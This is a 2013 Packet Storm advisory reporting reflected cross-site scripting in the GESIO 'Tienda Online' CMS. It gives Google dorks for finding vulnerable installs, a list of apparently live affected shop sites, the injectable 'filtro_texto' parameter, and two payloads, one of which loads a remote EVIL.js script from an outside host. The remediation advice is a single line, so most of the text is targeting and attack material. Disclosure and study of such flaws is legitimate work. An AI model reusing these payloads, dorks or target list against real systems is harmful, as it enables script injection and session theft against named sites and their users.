Tienda Online CMS Cross Site Scripting

2013-04-19T00:00:00
ID PACKETSTORM:121362
Type packetstorm
Reporter Ivan Sanchez
Modified 2013-04-19T00:00:00

Description

                                        
                                            `+=============================================================================================+  
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code +  
+=============================================================================================+  
  
  
Author(s): Ivan Sanchez & Raul Diaz  
  
Product: Software Gestión GESIO   
Web:http://www.gesio.com/  
Versions: Modulo / Tienda Online - CM  
Date: 18/04/2013  
  
Vendor Notified: 18/04   
Vendor Notified again: 19/04  
  
Extract:  
http://www.gesio.com/tienda-online-cms-89-50-431/  
"Tu tienda Online conectada a tu facturación diaria. Facturarás con el mismo sistema que vendes online.  
En GESIO® pensamos que un sistema de gestión online debe tener la posibilidad de desarrollar Tienda Online"   
  
  
GOOGLE DORKS:  
------------  
  
allintext:POLÍTICA DE PROTECCIÓN DE DATOS -Software Gestión GESIO®  
  
inurl:cms/site_0003  
  
  
Sites affected   
--------------------  
  
ALL SITES USING THIS CM  
  
http://www.qualitycenter.es/lp/  
http://www.greenhabit.es/lp/  
http://www.latiendadelhormigonimpreso.com/lp/  
http://www.minisub.es/lp/  
http://www.vitalarchery.com/lp/  
http://www.palacios-congresos-es.com/lcli/  
http://www.aulasconsoftware.com/lp/  
http://www.arthulencourt.eu/lp/  
http://www.soltercam.com/lp/  
http://www.sol-i-vent.es/lp/  
http://www.ale-hop.org/lp/  
http://creugal-hobby.com/lp/  
http://www.xipnet.es/lp/  
http://www.canterbury.es/lp/  
http://ociostock.com/lp/  
http://guatebloem.com/productos_listado.php  
  
much more....  
  
Attacks >>>>>>>>>>>>>>>>>>>  
  
  
XSS & REMOTE INJECTION CODE:  
---------------------------  
  
'">><marquee><h1>EvilCode Team</h1></marquee>  
  
Or  
  
"><script src=http://nullcode.com.ar/code/scripts/EVIL.js></script> EXTERNAL EVIL CODE !  
  
  
Parameter Affected:  
-------------------  
  
--form 1 --  
  
http://www.sites/comunicados_listado.php?filtro_texto= INJECT HERE  
  
and much more...  
  
Remediation:  
------------  
  
Could you please validate the input , sanitize each parameter.  
  
  
Thanks you so much!  
  
  
  
NULL CODE SERVICES [ www.evilcode.com.ar ] Hunting Security Bugs!  
+=============================================================================================+  
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code +  
+=============================================================================================+  
`